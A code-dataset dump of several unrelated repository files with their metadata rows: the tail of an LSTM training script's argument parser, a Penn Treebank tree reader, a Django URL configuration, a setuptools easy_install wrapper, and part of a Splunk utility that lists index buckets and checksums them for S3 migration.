    # any value passed to --shuffle used to enable it. Parse truthy strings
    # explicitly instead (backward compatible: --shuffle True still works).
    def _parse_bool(value):
        return str(value).strip().lower() in ('true', '1', 'yes', 'y')

    parser.add_argument('-t', '--train', action='store_true', help='Training Pipeline Mode')
    parser.add_argument('-d', '--dataset', action='store_true', help='Dataset Pipeline Mode')

    parser.add_argument('--split_size', type=float, default=0.8, help='Split size for dataset')
    parser.add_argument('--shuffle', type=_parse_bool, default=True, help='Shuffle dataset')
    parser.add_argument('--seed', type=int, default=2021, help='Seed')
    parser.add_argument('--preload', type=str, default='resources/data/prep_data_v2.csv', help='Preload for dataset')
    parser.add_argument('--data_path', type=str, default='resources/train.csv', help='Dataset to load')
    parser.add_argument('--tokenizer', type=str, default='custom', help='Tokenizer: custom or keras')

    parser.add_argument('--emb_size', type=int, default=50, help='Word embedding size')
    parser.add_argument('--lstm_units', type=int, default=30, help='LSTM units')
    parser.add_argument('--dropout', type=float, default=0.3, help='Dropout')
    parser.add_argument('--lr', type=float, default=1e-2, help='Learning Rate')

    parser.add_argument('--batch_size', type=int, default=32, help='Batch Size')
    parser.add_argument('--epochs', type=int, default=1, help='epochs')

    parsed_args = parser.parse_args()

    main(parsed_args)
"danielemoltisanti@live.it"
] | danielemoltisanti@live.it |
f600154069f115ceac5a31461d0b5aa19ee162f8 | e3b4e076a301cf2cbb78014dfa4f04e1bb368e15 | /treedata.py | d3e0f330e88094e6b266a062a2f6eea8532340f1 | [] | no_license | jzhao20/nlp_assignment_3 | 77e2cf6e0df2b758a16ac71b0ef18a722f5afb79 | d067f89605c0b04138a90e41e2defa80a3a1e1f2 | refs/heads/main | 2023-08-07T18:13:18.869462 | 2021-09-30T17:26:56 | 2021-09-30T17:26:56 | 411,349,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,384 | py | # posdata.py
from typing import List
import re
class TaggedToken:
    """A single surface word paired with its part-of-speech tag."""

    def __init__(self, word: str, tag: str):
        self.word = word
        self.tag = tag

    def __repr__(self):
        return f"({self.word}, {self.tag})"

    def __str__(self):
        return repr(self)
class LabeledSentence:
    """Thin wrapper around a sequence of tagged tokens forming a sentence."""

    def __init__(self, tagged_tokens):
        self.tagged_tokens = tagged_tokens

    def __repr__(self):
        token_reprs = [repr(token) for token in self.tagged_tokens]
        return repr(token_reprs)

    def __str__(self):
        return repr(self)

    def __len__(self):
        return len(self.tagged_tokens)

    def get_words(self):
        """Return just the words, in sentence order."""
        return [token.word for token in self.tagged_tokens]

    def get_tags(self):
        """Return just the POS tags, in sentence order."""
        return [token.tag for token in self.tagged_tokens]
def labeled_sent_from_words_tags(words, tags):
    """Zip parallel word/tag lists into a LabeledSentence."""
    paired = [TaggedToken(word, tag) for word, tag in zip(words, tags)]
    return LabeledSentence(paired)
def read_labeled_sents(file):
    """
    Reads a file with word<tab>tag per line, with one blank line between
    sentences.

    :param file: path to the tagged-token file (UTF-8)
    :return: list of LabeledSentence
    """
    sentences = []
    curr_tokens = []
    # `with` ensures the handle is closed (the original left it open).
    with open(file, encoding='utf-8') as f:
        for line in f:
            stripped = line.strip()
            if stripped != "":
                fields = stripped.split("\t")
                # Silently skip malformed lines without exactly two fields.
                if len(fields) == 2:
                    curr_tokens.append(TaggedToken(fields[0], fields[1]))
            elif stripped == "" and len(curr_tokens) > 0:
                sentences.append(LabeledSentence(curr_tokens))
                curr_tokens = []
    # Flush the final sentence when the file does not end with a blank line
    # (the original dropped it).
    if len(curr_tokens) > 0:
        sentences.append(LabeledSentence(curr_tokens))
    print("Read %i sents from %s" % (len(sentences), file))
    return sentences
class Tree:
    """
    Recursive type that defines a tree structure. Wraps a label (for the
    current node) and a list of children which are also Tree objects.
    """
    def __init__(self, label: str, children=None):
        # A mutable default argument ([]) would be shared by every Tree
        # created without explicit children, so add_child on one such tree
        # would silently corrupt all of them. Build a fresh list instead.
        self.label = label
        self.children = list(children) if children is not None else []

    def __repr__(self):
        if self.is_preterminal():
            return "(%s %s)" % (self.label, self.children[0].label)
        else:
            return "(%s %s)" % (self.label, " ".join([repr(c) for c in self.children]))

    def __str__(self):
        return self.__repr__()

    def is_terminal(self):
        """A leaf node (a word)."""
        return len(self.children) == 0

    def is_preterminal(self):
        """A POS-tag node directly above a single word."""
        return len(self.children) == 1 and self.children[0].is_terminal()

    def render_pretty(self):
        """Multi-line indented rendering (for debugging; parens not closed)."""
        return self._render_pretty_helper(0)

    def _render_pretty_helper(self, indent_level):
        if self.is_terminal():
            return (" " * indent_level) + self.label
        if self.is_preterminal():
            return (" " * indent_level) + "(" + self.label + " " + self.children[0].label + ")"
        else:
            return (indent_level * " ") + "(" + self.label + "\n" + "\n".join([c._render_pretty_helper(indent_level + 2) for c in self.children])

    def set_children(self, new_children):
        self.children = new_children

    def add_child(self, child):
        self.children.append(child)
def _read_tree(line: str) -> Tree:
    """
    :param line: a PTB-style bracketed representation of a string, like this: ( (S ... ) ) or (ROOT (S ... ) )
    :return: the Tree object
    """
    # Put in an explicit ROOT symbol for the root to make parsing easier
    raw_line = line
    if line.startswith("( "):
        line = "(ROOT " + line[1:]
    # Surround ( ) with spaces so splitting works
    line = re.sub(r"\(", " ( ", line)
    line = re.sub(r"\)", " ) ", line)
    # We may have introduced double spaces, so collapse these down
    line = re.sub(r"\s{2,}", " ", line)
    tokens = list(filter(lambda tok: len(tok) > 0, line.split(" ")))
    # Parse the bracket representation into a tree
    # just_saw_open: the previous token was "(", so the next bare token is a
    # node label rather than a terminal word.
    just_saw_open = False
    # stack holds the chain of currently-open (not yet closed) Tree nodes.
    stack = []
    # latest_word buffers a terminal word until its closing ")" attaches it.
    latest_word = ""
    for tok in tokens:
        if tok == "(":
            just_saw_open = True
        elif tok == ")":
            if latest_word != "":
                # Closing a preterminal: attach the buffered word as a child of
                # the top-of-stack node, then hang that node off its parent.
                tree = stack[-1]
                tree.add_child(Tree(latest_word, []))
                latest_word = ""
                stack[-2].add_child(tree)
                stack = stack[:-1]
            else:
                # Closing an inner node: pop it and attach it to its parent.
                if len(stack) >= 2: # only violated for the last paren
                    stack[-2].add_child(stack[-1])
                    stack = stack[:-1]
        else:
            if just_saw_open:
                # Token directly after "(" is a constituent/POS label.
                tree = Tree(tok, [])
                stack.append(tree)
                just_saw_open = False
            else:
                # The only time we get a string *not* after an open paren is when it's a word and not a tag
                latest_word = tok
    # A well-formed line leaves exactly the ROOT node on the stack.
    if len(stack) != 1:
        print("WARNING: bad line: %s" % raw_line)
    return stack[0]
def read_parse_data(file):
    """
    :param file: a file in PTB format, one tree per line
    :return: A list of Trees
    """
    trees = []
    # "with" ensures the handle is closed (the original leaked it).
    with open(file, encoding='utf-8') as f:
        for line in f:
            stripped = line.strip()
            trees.append(_read_tree(stripped))
            # Progress indicator for very large treebanks.
            if len(trees) % 10000 == 0:
                print("Read %i trees" % len(trees))
    return trees
if __name__=="__main__":
    # Quick smoke test: load the dev treebank and pretty-print the first ten trees.
    parsedTrees = read_parse_data("data/alltrees_dev.mrg.oneline")
    for treeIdx in range(10):
        print("==========================")
        print(parsedTrees[treeIdx].render_pretty())
| [
"jzhaotxus@gmail.com"
] | jzhaotxus@gmail.com |
33af5581f9f4a7828383e77b5e0c423a4f3bed87 | 972dab2bb13ea53395683c45492e035d8c46c94b | /apps/proyectos/urls.py | c9ca782b6538537ab4d5e48e6eaa150698521378 | [] | no_license | WilfredLemus/BibliotecaCodigo | 421e15b3ceca79b575d6c92538b2795706516a79 | cc6f9406eeddb950faa8ad76c59eb01a3220835a | refs/heads/master | 2021-05-27T17:58:30.641169 | 2014-01-27T01:58:02 | 2014-01-27T01:58:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from django.conf.urls import patterns, url
# Route table for the "proyectos" app; view names below are resolved against
# the 'apps.proyectos.views' prefix (legacy Django patterns() call syntax).
urlpatterns = patterns ('apps.proyectos.views',
    # Project list page.
    url(r'^proyectos/$','view_proyectos', name = 'proyectos'),
    # Create a new project.
    url(r'^add/proyecto/$','view_agregar_proyecto', name = 'agregar_proyecto'),
    # Edit an existing project, keyed by id_proyecto.
    url(r'^proyecto/editar/(?P<id_proyecto>.*)/$','editar_proyecto_view',name='editar_proyecto'),
    # Project detail page.
    url(r'^proyecto/detalles/(?P<id_proyecto>.*)/$','single_proyecto_view',name='detalle_proyecto'),
    # Delete a project.
    url(r'^proyecto/eliminar/(?P<id_proyecto>.*)/$','eliminiar_proyecto_view',name='eliminar_proyecto'),
)
| [
"debian789@gmail.com"
] | debian789@gmail.com |
3175238714d0bced9a25c0a8ef31ca52742ce751 | 0d85ca475e5aba14eddf1246c0baff66e1f55a98 | /falcon-query/soft/open-falcon/portal/env/bin/easy_install | 3b8f471024acc74e998c22afd47f2eb619bb55cf | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | xinghui-hou/docker | 2a71a40efee0b4659924ada24b46efb3cd1e67ee | dccd48383533b4d47f1ac42005df007a3b8c6e53 | refs/heads/master | 2020-04-18T04:59:58.952180 | 2017-11-30T07:13:40 | 2017-11-30T07:13:40 | 67,863,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | #!/usr/local/open-falcon/portal/env/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==0.9.8','console_scripts','easy_install'
# Auto-generated setuptools console-script wrapper; not meant to be hand-edited.
__requires__ = 'setuptools==0.9.8'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Resolve the 'easy_install' console_scripts entry point of the pinned
    # setuptools version, invoke it, and exit with its return value.
    sys.exit(
        load_entry_point('setuptools==0.9.8', 'console_scripts', 'easy_install')()
    )
| [
"hxh-x@163.com"
] | hxh-x@163.com | |
fa935631baa4e8f18f2cf046d8623296ab6d84d1 | 31442711c0efd06805349594d56519ad2d5e144b | /bucketUtilNew.py | 119f9622a99bab12fdb8cd79552c63d5cf84d746 | [] | no_license | 1989jpj/s3migration | 3d24975291b41c1a4945642b1b5883799a46cf42 | a7c772593d335e8f75dca570e668dfb4aa6e1c03 | refs/heads/master | 2021-01-18T14:29:42.851575 | 2016-06-17T18:54:05 | 2016-06-17T18:54:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,352 | py | import splunk.clilib.cli_common
# Import with "from" to minimize changes to splunkDBPaths().
from splunk.clilib.info_gather import normalize_path
#from info_gather import normalize_path
import argparse, copy, hashlib, json, os, re, shutil, subprocess, sys, time
import collections, glob, hmac, logging, operator, requests, StringIO, socket, urllib
import pprint
import lxml.etree as et
# - Usage:
# - Scan for files in paths.
# - Next execute: Checksum stuff.
# - Next execute: Do S3 uploads.
# - Optional: Check MD5s before this.
# - Must also upload checksums file.
# - Then get list of all buckets in S3.
# - Generate new owner list.
# - Download.
# - Verify checksums.
# - Stop Splunk, move data into place, start Splunk.
# User configurable. Don't include leading or trailing slashes.
S3_BASE_PATH = "splunkcloud-fb-migration/Production"
# Key names used in per-file transfer metadata dicts.
KEY_MD5HASH = "md5Hash"
KEY_METADATA = "metadata"
# S3 endpoint pieces used when building URLs and signing raw listing requests.
S3_URL_PREFIX = "s3://"
S3_HOSTNAME = "s3.amazonaws.com"
XML_AWS_NS = "http://s3.amazonaws.com/doc/2006-03-01/"
# Reserved S3 "directory" for side files (manifests, checksums, bucketlists).
KEY_EXTRADATA = "EXTRADATA"
KEY_CHKSUMLIST = "checksumlist"
# Transfer-direction markers accepted by run_s3_command().
MODE_UPLOAD = "upload"
MODE_DOWNLOAD = "download"
# Local staging dir name (not referenced in the code visible here).
STAGING_DIR = "S3_DATA_IMPORT_STAGING"
class IndexLocation(object):
    """One (index name, directory, directory type) triple describing where a
    Splunk index keeps one class of buckets (home/cold/thawed)."""
    # The only bucket-directory types indexes.conf supports.
    VALID_PATHKEYS = ('homePath', 'coldPath', 'thawedPath')
    def __init__(self, indexName, dirPath, dirType):
        # Uses raise Exception(...) call syntax instead of the Python-2-only
        # "raise Exception, msg" statement form; behavior is identical.
        if not indexName:
            raise Exception("Bug: IndexLocation created with empty index name!")
        self.indexName = indexName
        if not dirPath:
            raise Exception("Bug: IndexLocation created with empty dir!")
        self.dirPath = dirPath
        if dirType not in self.VALID_PATHKEYS:
            raise Exception("Bug: IndexLocation created with invalid directory"
                            " type=\"%s\"!" % dirType)
        self.dirType = dirType
# Module-level cache for splunkDBPaths(); computing the answer is slow (~4s).
computed_db_paths = None
def splunkDBPaths(mergedIndexConf):
    """This is stolen directly from splunk.clilib.info_gather.py, with a few
    modifications so we can tell which buckets reside in warm vs cold. Some
    less than ideal components are left to make a later diff easier to read."""
    # if cached, return answer -- surprisingly computing this takes like 4 seconds
    global computed_db_paths
    if computed_db_paths:
        return computed_db_paths
    # first get all the index path config strings
    # Will contain IndexLocation objects.
    index_paths = []
    index_confs = mergedIndexConf
    req_parm_warning = 'Indexing stanza [%s] is missing required parameter "%s"'
    # volume:<name> stanza -> its configured base path.
    volumes = {}
    pathKeys = ['homePath', 'coldPath', 'thawedPath']
    for stanza_name in index_confs.keys():
        if stanza_name == 'default':
            continue
        stanza = index_confs[stanza_name]
        # ignore disabled index stanzas
        if stanza.get('disabled') == "true":
            continue
        if stanza_name.startswith('volume:'):
            # skip broken volume groups
            if not stanza.has_key('path'):
                logging.warn("The indexing volume %s does not have a path defined, this is an error." % (stanza_name))
                continue
            volumes[stanza_name] = stanza['path']
        # ignore all virtual indexes for diag-building purposes, but warn if they seem broken
        elif stanza_name.startswith('provider-family:'):
            if not stanza.has_key('vix.mode'):
                logging.warn(req_parm_warning % (stanza_name, 'vix.mode'))
            if not stanza.has_key('vix.command'):
                logging.warn(req_parm_warning % (stanza_name, 'vix.command'))
            continue
        elif stanza_name.startswith('provider:'):
            if not stanza.has_key('vix.family'):
                logging.warn(req_parm_warning % (stanza_name, 'vix.family'))
            continue
        elif stanza.has_key("vix.provider"):
            logging.info('Virtual index "%s" found, not scanning for diag.' % stanza_name)
            continue
        # it's an index definition, get the paths
        else:
            for pathKey in pathKeys:
                if not stanza.has_key(pathKey):
                    logging.warn("The index %s does not have a value set for %s, this is unusual." % (stanza_name, pathKey))
                else:
                    # Record which of home/cold/thawed this dir is - the whole
                    # point of this local fork of the upstream function.
                    index_paths.append(IndexLocation(stanza_name,
                        stanza.get(pathKey), pathKey))
    def expand_vol_path(orig_path, volumes=volumes):
        # Replace a leading "volume:<name>" segment with the volume's real
        # base path; returns None (filtered out below) if unresolvable.
        if not orig_path.startswith('volume:'):
            return orig_path
        tmp_path = orig_path
        if os.name == "nt" and (not '\\' in tmp_path) and ('/' in tmp_path):
            tmp_path = orig_path.replace('/','\\')
        if not os.path.sep in tmp_path:
            logging.warn("Volume based path '%s' contains no directory seperator." % orig_path)
            return None
        volume_id, tail = tmp_path.split(os.path.sep, 1)
        if not volume_id in volumes:
            logging.warn("Volume based path '%s' refers to undefined volume '%s'." % (orig_path, volume_id))
            return None
        return os.path.join(volumes[volume_id], tail)
    # detect and expand volume paths
    paths = copy.deepcopy(index_paths)
    for indexPath in paths:
        indexPath.dirPath = expand_vol_path(indexPath.dirPath)
    paths = filter(lambda x: x.dirPath, paths) # remove chaff from expand_vol_path
    for indexPath in paths:
        indexPath.dirPath = normalize_path(indexPath.dirPath)
    paths = filter(lambda x: x.dirPath, paths) # remove chaff from normalize_paths
    # cache answer
    computed_db_paths = paths
    return paths
def filter_internal_index_dirs(indexLocations):
    """For the purposes of moving indexed data to another instance, the below
    dirs tend to not be very useful. (Fishbucket, internal, introspection..)"""
    # The slashes match whole path segments; they are literal, not regex syntax.
    # TODO: make this configurable at command line.
    unwantedRE = re.compile("/(fishbucket|_introspection)/")
    return [loc for loc in indexLocations
            if unwantedRE.search(loc.dirPath) is None]
def failed_test(msg):
    """Print a test-failure message to stderr and exit with status 1.

    BUGFIX: the original wrote the bare format string ("TEST FAILED: %s")
    without ever interpolating msg into it.
    """
    sys.stderr.write("\nTEST FAILED: %s\n" % msg)
    sys.exit(1)
class BucketCollection(object):
    """In-memory set of buckets keyed by index name, bucket type
    (home/cold/thawed) and parent directory, with JSON-lines (de)serialization."""
    # JSON field names used by toFile()/fromFile().
    KEY_INDEXNAME = "indexName"
    KEY_DIRTYPE = "dirType"
    KEY_BUCKETPARENTDIR = "bucketParentDir"
    KEY_BUCKETNAME = "bucketName"
    def __init__(self):
        self._bucketCount = 0
        # Structure is { index_name : { hot/warm/thaw : { path : buckets } } }.
        self._bucketInfo = {}
    def __repr__(self):
        return pprint.pformat(self._bucketInfo)
    def __len__(self):
        return self._bucketCount
    def addBuckets(self, indexName, bucketType, parentDir, bucketDirs):
        """Record buckets; bucketDirs may be one name or a sequence of names.
        Duplicates (same index/type/dir/name) are silently skipped."""
        # Accept a single bucket name as well as a sequence of them. Written
        # so the string check works on both Python 2 (str/unicode) and 3.
        if isinstance(bucketDirs, (str, u"".__class__)):
            bucketDirs = (bucketDirs,)
        # Create dict for this index if DNE.
        if not indexName in self._bucketInfo:
            self._bucketInfo[indexName] = {}
        # Create hot/warm/thaw bucket dict if DNE.
        if not bucketType in self._bucketInfo[indexName]:
            self._bucketInfo[indexName][bucketType] = {}
        # Finally, save list of buckets in said dict.
        if not parentDir in self._bucketInfo[indexName][bucketType]:
            self._bucketInfo[indexName][bucketType][parentDir] = []
        for bucket in bucketDirs:
            # Don't dupe... helps populating this thing from S3, which lists
            # full file paths rather than directories and such.
            if bucket in self._bucketInfo[indexName][bucketType][parentDir]:
                continue
            self._bucketInfo[indexName][bucketType][parentDir].append(bucket)
            self._bucketCount += 1
    def items(self):
        """Yield (indexName, dirType, bucketParentDir, bucketName) tuples."""
        for indexName, indexInfo in self._bucketInfo.items():
            for dirType, indexLocs in indexInfo.items():
                for bucketParentDir, buckets in indexLocs.items():
                    for bucketName in buckets:
                        yield (indexName, dirType, bucketParentDir, bucketName)
    def indexNames(self):
        # BUGFIX: original referenced the bare name _bucketInfo (NameError at
        # runtime); it must be read off self.
        return list(self._bucketInfo.keys())
    def toFile(self, filePath):
        """Atomic write by way of temp file. File format is one json object per line."""
        tmpPath = filePath + ".tmp"
        with open(tmpPath, "w") as outFd:
            for indexName, dirType, bucketParentDir, bucketName in self.items():
                outDict = {self.KEY_INDEXNAME : indexName,
                           self.KEY_DIRTYPE : dirType,
                           self.KEY_BUCKETPARENTDIR : bucketParentDir,
                           self.KEY_BUCKETNAME : bucketName}
                # Sort for easier readability/comparisons.
                outFd.write("%s\n" % json.dumps(outDict, sort_keys=True))
        shutil.move(tmpPath, filePath)
    def fromFile(self, filePath):
        """Hope nobody's corrupted you..."""
        # BUGFIX: close the file handle when done (original leaked it).
        with open(filePath, "r") as inFd:
            for line in inFd:
                inDict = json.loads(line.strip())
                self.addBuckets( inDict[self.KEY_INDEXNAME],
                                 inDict[self.KEY_DIRTYPE],
                                 inDict[self.KEY_BUCKETPARENTDIR],
                                 (inDict[self.KEY_BUCKETNAME],))
class TransferMetadata(object):
    """Per-file info. Currently this just holds checksums."""
    def __init__(self, kvDict):
        # Instance attribute (the original used a class-level default; that
        # happened to work for an immutable None but is a shared-state trap).
        self._md5Hash = None
        # TODO: validate contents look reasonable.
        # TODO: complain about any unrecognized data.
        if KEY_MD5HASH in kvDict:
            self._md5Hash = kvDict[KEY_MD5HASH]
    def md5Hash(self):
        # Hex digest string, or None if not yet computed.
        return self._md5Hash
    def setMd5Hash(self, md5Hash):
        self._md5Hash = md5Hash
    def asDict(self):
        # Aim to not save incomplete data structures! Indicates user error.
        # TODO: Maybe we need this so can do scan, then checksum...
        if not self._md5Hash:
            raise Exception("Bug: Attempting to serialize metadata without computing MD5 checksum.")
        return {KEY_MD5HASH : self._md5Hash}
class TransferMetadataCollection(object):
"""Complete list of buckets, their metadata, etc to be transferred."""
_metadataDict = {}
_filePath = None
def __contains__(self, filePath):
return filePath in self._metadataDict
def add(self, filePath, metadata):
"""Add metadata for a file."""
self._metadataDict[filePath] = TransferMetadata(metadata)
def __init__(self, filePath):
"""Load existing metadata from disk."""
self._filePath = filePath
data = splunk.clilib.cli_common.readConfFile(self._filePath)
# File does not exist, or empty for some reason.
if not data or (1 == len(data) and "default" in data):
return
for filePathStanza, metadata in data.items():
self.add(filePathStanza, metadata)
def scan_for_new_files(self, bucketCollection):
"""Scan the bucket parent dirs for any files that we don't already know
about. Any missing files will be added to our collection."""
for indexName, dirType, bucketParentDir, bucketName in bucketCollection.items():
bucketPath = os.path.join(bucketParentDir, bucketName)
# Recursive file listing.
for dirPath, subdirs, files in os.walk(bucketPath):
for file in files:
filePath = os.path.join(dirPath, file)
if not filePath in self:
self.add(filePath, {}) # Empty metadata for now.
def generate_missing_checksums(self):
"""Generate MD5 checksums for any files in our existing list that don't
have them populated. Note that this does not cause a rescan, but
after the first requested scan, this will result in checksumming all
files. Also ote that this function does not verify existing
populated checksums."""
# Check for and generate MD5s.
for filePath, metadata in self._metadataDict.items():
if not metadata.md5Hash():
print "Generating MD5 for file=\"%s\"..." % filePath
fd = open(filePath, "rb")
metadata.setMd5Hash(fileMd5Hash(fd))
def write(self):
"""Save built up dict to disk in one shot. Not an incremental write,
but does do an atomic overwrite of the dest file (by way of temp
file)."""
writeableDict = {}
for filePath, metadata in self._metadataDict.items():
writeableDict[filePath] = metadata.asDict()
tmpFilePath = self._filePath + ".tmp"
splunk.clilib.cli_common.writeConfFile(tmpFilePath, writeableDict)
# Success! Simulate atomic write.
shutil.move(tmpFilePath, self._filePath)
### def make_metafile_path(instanceGuid):
### mfPath = os.path.expanduser(os.path.join("~", "/splunk_bucketfiles_%s.conf" % instanceGuid))
### if mfPath.startswith("~"):
### raise Exception, "Could not lookup home dir while creating metafile path!"
### return mfPath
def fileMd5Hash(fd):
    """Stream fd through MD5 in 64 KiB chunks and return the hex digest."""
    digest = hashlib.md5()
    while True:
        chunk = fd.read(65536)
        if not chunk:
            return digest.hexdigest()
        digest.update(chunk)
### def generate_s3_upload_commands(instanceGuid, bucketCollection):
### for indexName, dirType, bucketParentDir, bucketName in bucketCollection.items():
### print "aws s3 sync %s s3://amrit-test/nike_cluster_indexes/%s/%s/%s/%s" % (
### os.path.join(bucketParentDir, bucketName),
### indexName, dirType, instanceGuid, bucketName)
def get_instance_guid():
    """Read this Splunk instance's GUID out of etc/instance.cfg."""
    cfgPath = os.path.join(splunk.clilib.cli_common.splunk_home, "etc", "instance.cfg")
    instanceCfg = splunk.clilib.cli_common.readConfFile(cfgPath)
    return instanceCfg["general"]["guid"]
class CMD_GenBucketlistWarmCold(object):
def run(self, args):
self._args = args
# Convenience...
self.instance_guid = get_instance_guid()
allBuckets = self.get_instance_buckets()
dstPath = self.make_bucketlist(self.instance_guid)
allBuckets.toFile(dstPath)
print "\nSaved bucket listing to file=\"%s\"." % dstPath
if self._args.print_all:
pprint.pprint(allBuckets)
def __init__(self, destSubParser, cmdName):
myParser = destSubParser.add_parser(cmdName)
myParser.set_defaults(func=self.run)
myParser.add_argument("--no-warn-on-hots", action="store_true",
help="Do not warn if any hot buckets are found.")
myParser.add_argument("--ignore-manifests", action="store_true",
help="Don't store .bucketManifest contents (these usually are not needed).")
myParser.add_argument("--indexes", default="",
help="CSV whitelist of names of indexes to dump.")
myParser.add_argument("--print-all", action="store_true",
help="Also print all index paths that will be processed, and the resulting buckets.")
def make_bucketlist(self, instanceGuid):
return "splunk_bucketlist_%s.json" % instanceGuid
def filter_to_requested_indexes(self, indexLocations, indexWhitelist):
if not indexWhitelist:
return indexLocations
filtered = []
for index in indexLocations:
if index.indexName in indexWhitelist:
filtered.append(index)
return filtered
def get_instance_buckets(self):
"""Returns a BucketCollection."""
indexLocations = splunkDBPaths(splunk.clilib.cli_common.getMergedConf('indexes'))
### TODO: review what's being filtered out.
indexLocations = filter_internal_index_dirs(indexLocations)
indexLocations = self.filter_to_requested_indexes(indexLocations, self._args.indexes)
if self._args.print_all:
print "Enabled index paths:\n\t%s\n" % str.join("\n\t",
[ x.dirPath for x in indexLocations ])
return self.enumerate_buckets_in_dirs(indexLocations)
def enumerate_buckets_in_dirs(self, indexLocations):
"""Returns a BucketCollection."""
IGNORE_FILES = ["GlobalMetaData", "CreationTime"]
bucketCollection = BucketCollection()
if not self._args.ignore_manifests:
timeStr = time.strftime("%Y%m%d-%H%M%S", time.gmtime())
manifestBaseDir = os.path.join("splunk_bucketmanifests",
self.instance_guid, timeStr)
print "Will save bucket manifests to dir=\"%s\".\n" % manifestBaseDir
os.makedirs(manifestBaseDir)
for thisIndexLoc in indexLocations:
bucketDirs = []
dirEntries = os.listdir(thisIndexLoc.dirPath)
for thisEntry in dirEntries:
if thisEntry.startswith("db_") or thisEntry.startswith("rb_"):
bucketDirs.append(thisEntry)
# Store manifest in splunk_bucketmanifests/guid/time/index/dirType/.
elif ".bucketManifest" == thisEntry:
if self._args.ignore_manifests:
continue
dstDir = os.path.join(manifestBaseDir,
thisIndexLoc.indexName, thisIndexLoc.dirType)
os.makedirs(dstDir)
# Copy to non-dot filename for easy viewing.
shutil.copy(os.path.join(thisIndexLoc.dirPath, ".bucketManifest"),
os.path.join(dstDir, "bucketManifest"))
# These non-bucket files don't need to be transferred, per VP.
elif thisEntry in IGNORE_FILES:
pass
# Hot bucket or streaming/replicating hot bucket!
elif thisEntry.startswith("hot_") or thisEntry[0].isdigit():
if self._args.no_warn_on_hots:
continue
print "*** WARNING: Ignoring hot bucket=\"%s\" ***" % \
os.path.join(thisIndexLoc.dirPath, thisEntry)
else:
print "*** ODD PATH FOUND: %s ***" % \
os.path.join(thisIndexLoc.dirPath, thisEntry)
if 0 != len(bucketDirs):
bucketCollection.addBuckets(thisIndexLoc.indexName,
thisIndexLoc.dirType, thisIndexLoc.dirPath, bucketDirs)
return bucketCollection
class CMD_GenChecksumsFromBucketlist(object):
    """Subcommand: MD5-checksum every file of every bucket named in a
    bucketlist file, writing an "md5sum -c"-compatible checksum file."""
    def run(self, args):
        self._args = args
        # Convenience...
        self.instance_guid = get_instance_guid()
        knownBuckets = BucketCollection()
        knownBuckets.fromFile(self._args.input_file)
        self.process_all_files(knownBuckets)
    def __init__(self, destSubParser, cmdName):
        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("input_file")
    def make_checksum_filename(self, instanceGuid):
        # Name of the checksum file this command emits.
        return "splunk_%s_%s.md5" % (KEY_CHKSUMLIST, instanceGuid)
    def split_whole_path(self, pathToSplit):
        """Python, why you make me do this... Split a path into ALL of its
        components (including the root), in left-to-right order."""
        pieces = []
        while True:
            parents, pathSeg = os.path.split(pathToSplit)
            # os.path.split is a fixpoint at the root - stop there.
            if parents == pathToSplit:
                pieces.append(pathToSplit)
                break
            pieces.append(pathSeg)
            pathToSplit = parents
        pieces.reverse()
        return pieces
    def bucket_item_rel_path(self, bucketPath, bucketName):
        """Path relative to (and including) the index-name dir, two levels
        above the bucket dir, e.g.
        db_1417732610_1417300621_105/rawdata -> _internaldb/db/db_1417732610_1417300621_105/rawdata"""
        pieces = self.split_whole_path(bucketPath)
        bucketNameIdx = pieces.index(bucketName)
        # Layout is .../<indexName>/<db|colddb|thaweddb>/<bucketName>/...
        indexNameIdx = bucketNameIdx - 2
        return os.path.join(*pieces[indexNameIdx:])
    def process_all_files(self, knownBuckets):
        """Walk every bucket dir and write one "<md5> <relpath>" line per file."""
        fn = self.make_checksum_filename(self.instance_guid)
        print("Writing to path=%s ..." % fn)
        # BUGFIX: "with" so the output file is flushed and closed even on
        # error (the original never closed either file handle explicitly).
        with open(fn, "w") as outFd:
            sys.stdout.write("Working...")
            for index, dirType, dirPath, bucketName in knownBuckets.items():
                for parentDir, subdirs, files in os.walk(os.path.join(dirPath, bucketName)):
                    for file in files:
                        bucketItemPath = os.path.join(parentDir, file)
                        itemRelPath = self.bucket_item_rel_path(bucketItemPath, bucketName)
                        with open(bucketItemPath, "r") as inFd:
                            # Two spaces here are important for "md5sum -c" to later work!
                            outFd.write("%s %s\n" % (fileMd5Hash(inFd), itemRelPath))
                    # One progress dot per directory visited.
                    sys.stdout.write(".")
                    sys.stdout.flush()
        sys.stdout.write(" Done!\n\n")
class RoundRobinFileReader(object):
    """Very simple way of round robining line-read requests across a set of
    files. Note that for a large set of passed-in files, this implementation
    will result in many file descriptors being open concurrently (one per)..."""
    def numFiles(self):
        return len(self._fdList)
    def __init__(self, rawFDs):
        """Accepts list of readable FDs. This used to take in actual filepaths
        but I changed it to FDs just to make testing a little easier. Could
        still use another interface for taking filepaths."""
        self._fdList = rawFDs
        self._curFdIdx = 0
        self._closedFds = 0
    def readline(self):
        """Return the next line in round-robin order, or "" once every
        underlying file is at EOF (exhausted FDs are closed as found)."""
        # BUGFIX: with zero files we are trivially at EOF; the original raised
        # IndexError (and would have modulo'd by zero) here.
        if 0 == self.numFiles():
            return ""
        while True:
            curFd = self._fdList[self._curFdIdx]
            # Always advance to the next fd for the following iteration/call.
            self._curFdIdx = (self._curFdIdx + 1) % self.numFiles()
            # Already saw EOF on this fd.
            if curFd.closed:
                continue
            line = curFd.readline()
            if line:
                return line
            # EOF, close this fd.
            curFd.close()
            self._closedFds += 1
            # Are all files at EOF? Return EOF for the entire file set.
            if self.numFiles() == self._closedFds:
                return ""
    def __iter__(self):
        """Returns lines until we're out."""
        while True:
            line = self.readline()
            # EOF.
            if 0 == len(line):
                return
            yield line
class CMD_GenRandBucketOwnersFromBucketList(object):
    """Subcommand: given bucketlist files from several indexers, pick one
    assumed-primary owner per (bucketId, index) by round-robining the files,
    and save the result to splunk_bucketowners.json."""
    class AssumedPrimaryBucket(object):
        """One bucketlist JSON line parsed into bucketId/instanceGuid/indexName."""
        def __init__(self, jsonBlob):
            attrDict = json.loads(jsonBlob)
            bucketDirName = attrDict[BucketCollection.KEY_BUCKETNAME]
